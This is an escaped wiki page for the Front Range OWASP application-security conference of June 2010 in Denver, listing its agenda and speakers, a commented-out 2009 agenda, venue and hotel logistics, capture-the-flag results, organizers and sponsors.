This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.&lt;br /&gt;
&lt;br /&gt;
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010.  This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.&lt;br /&gt;
&lt;br /&gt;
====Registration====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com Registration is now open!] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009.  This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis.  Pay whatever you or your company can afford.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Click [http://froc2010.eventbrite.com HERE] to register now. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Agenda====&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 2 June 2010==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | June 2, 2010&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to FROC 2010 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[FROC2010_Abstract_Chess|&amp;quot;Watching Software Run: Software Security Beyond Defect Elimination&amp;quot;]]&lt;br /&gt;
''Brian Chess, Fortify Software''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&amp;amp;sort=name&amp;amp;layout=list&amp;amp;num=50 Presentation] [http://blip.tv/file/3710067 Video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --&amp;gt;&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:35-10:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP: State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''&lt;br /&gt;
&lt;br /&gt;
[http://blip.tv/file/3710155 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:00-10:20 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Cloud Security Alliance: State of the Union&lt;br /&gt;
''Randy Barr, Cloud Security Alliance''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:20-10:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:22%; background:#BC857A&amp;quot; | '''AppSec/Technical Track: Room 1'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; | '''Cloud/Mobile/Emerging Track: Room 2'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; | '''Management / Exec Track: Room 3'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]&amp;quot;&lt;br /&gt;
''Jeremiah Grossman''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_McClellan|&amp;quot;Building a Secure, Compliant Cloud for the Enterprise&amp;quot;]]&lt;br /&gt;
''Matt Ferrari, Hosting.com''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Byrne|&amp;quot;Anatomy of a Logic Flaw&amp;quot;]]&lt;br /&gt;
''David Byrne and Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]&amp;quot;&lt;br /&gt;
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Nickerson|&amp;quot;YOU are the weakest link&amp;quot;]]&lt;br /&gt;
''Chris Nickerson, Lares Consulting''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Whaley|&amp;quot;Effectively marketing security as a win for both the business and the customer&amp;quot;]]&lt;br /&gt;
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]&amp;quot;&lt;br /&gt;
''Alex Wheeler and Ryan Smith, Accuvant''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Roberts|&amp;quot;Real life CSI – Data Mining and Intelligence Gathering for the masses&amp;quot;]]&lt;br /&gt;
''Chris Roberts, Cyopsis''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Dickson|&amp;quot;The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise&amp;quot;]]&lt;br /&gt;
''John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:40 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]&amp;quot;&lt;br /&gt;
''David Byrne and Rohini Sulatycki, Trustwave''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Zusman2|&amp;quot;What's Old Is New Again: An Overview of Mobile Application Security&amp;quot;]]&lt;br /&gt;
''Zach Lanier and Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Goldschmidt|&amp;quot;Fundamental Practices and Tools to implement a security development lifecycle&amp;quot;]]&lt;br /&gt;
''Cassio Goldschmidt, Symantec''&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:40-15:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | BREAK&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an  Enterprise Security API]]&amp;quot;&lt;br /&gt;
''Chris Schmidt''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Tucker|&amp;quot;Cloudy with a chance of hack&amp;quot;]]&lt;br /&gt;
''Lars Ewe, Cenzic''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Cornell|&amp;quot;Application Security Program Management with Vulnerability Manager&amp;quot;]]&lt;br /&gt;
''Bryan Beverly, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Panel Discussion: Topic TBD.  Moderator: John Dickson, Denim Group&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Wrap up, vendor raffles, CTF awards, FREE BEER!&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Logistics====&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will again be held at University of Colorado, Denver.  However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).&lt;br /&gt;
&lt;br /&gt;
[[File:Froc map.GIF|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
[http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;geocode=&amp;amp;q=1200+Larimer+Street,+Denver,+CO&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=37.188995,62.226563&amp;amp;ie=UTF8&amp;amp;hq=&amp;amp;hnear=1200+Larimer+St,+Denver,+Colorado+80204&amp;amp;z=16&amp;amp;iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]&lt;br /&gt;
&lt;br /&gt;
=====Accomodation=====&lt;br /&gt;
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro].  Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&amp;amp;hotelID=14708 iHotelier.com link here].&lt;br /&gt;
&lt;br /&gt;
=====How to get to the venue?=====&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the UCD.  Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings.  Parking validation will be provided for registered FROC participants.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Call for Presentations====&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010.  We are no longer accepting proposals for presentations.  If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Agenda and Presentations: 5 March 2009====&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=2875886330538461390 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=1629208419122953007 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=3127205451740977427 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=7611144342490803641 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=129190988572738701 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=8588268474844052248 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Capture the Flag (CTF)====&lt;br /&gt;
&lt;br /&gt;
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications.   The winner received a new iPad.  Second and third place received an iPod shuffle.&lt;br /&gt;
&lt;br /&gt;
The team that won the contest consisted of four members of the Denver Defcon group, dc303 (http://dc303.org).  This group also plays in the annual Defcon CTF competition (with about 20 other folks from the Denver area).  If you are interested in joining them for future CTF competitions (local and abroad), contact mantis1 at gmail.com.&lt;br /&gt;
&lt;br /&gt;
Second place went to Matthew Rowley (playing on his own)&lt;br /&gt;
&lt;br /&gt;
Final scores:&lt;br /&gt;
{| border=&amp;quot;3&amp;quot;&lt;br /&gt;
|Rank||Name||Score||Comments&lt;br /&gt;
|-&lt;br /&gt;
|'''1'''||'''mantis'''||'''4500'''||&lt;br /&gt;
|-&lt;br /&gt;
|'''2'''||'''Matthew Rowley'''||'''2850'''||'''(wuntee)'''&lt;br /&gt;
|-&lt;br /&gt;
|'''3'''||'''jgimer'''||'''2300'''||&lt;br /&gt;
|-&lt;br /&gt;
|4||jsouza||2200||&lt;br /&gt;
|-&lt;br /&gt;
|5||CSURams||1800||&lt;br /&gt;
|-&lt;br /&gt;
|6||quincymagoo||1200||&lt;br /&gt;
|-&lt;br /&gt;
|7||skehoe||700||&lt;br /&gt;
|-&lt;br /&gt;
|8||jtevans||700||&lt;br /&gt;
|-&lt;br /&gt;
|9||igctf||700||&lt;br /&gt;
|-&lt;br /&gt;
|10||kdavis||700||&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Committee====&lt;br /&gt;
&lt;br /&gt;
FROC 2010 Planning Committee Chair: Kathy Thaxton -  kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
Presentation Selection Committee:&lt;br /&gt;
* Mark Bristow - OWASP Global Conference Committee&lt;br /&gt;
* David Campbell - OWASP Denver&lt;br /&gt;
* Eric Duprey - OWASP Denver&lt;br /&gt;
* Chris Hoff - Cloud Security Alliance&lt;br /&gt;
* Eoin Keary - Chair, OWASP Global Conference Committee&lt;br /&gt;
* Michael Sutton - Cloud Security Alliance&lt;br /&gt;
* Jim Reavis - Cloud Security Alliance&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell at owasp dot org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Sponsors====&lt;br /&gt;
&lt;br /&gt;
[[File:Sponsors.PNG]]&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[http://www.accuvant.com/ Accuvant]&lt;br /&gt;
*[http://www.denimgroup.com/ Denim Group]&lt;br /&gt;
*[http://www.fortify.com/ Fortify Software]&lt;br /&gt;
*[http://www.hosting.com/ Hosting.com]&lt;br /&gt;
*[http://www.whitehatsec.com/home/index.html Whitehat Security]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring next year's Front Range OWASP Conference, please contact Kathy Thaxton at kthaxton at owasp dot org.&lt;br /&gt;
&lt;br /&gt;
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Twitter Feed====&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) &lt;br /&gt;
&lt;br /&gt;
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
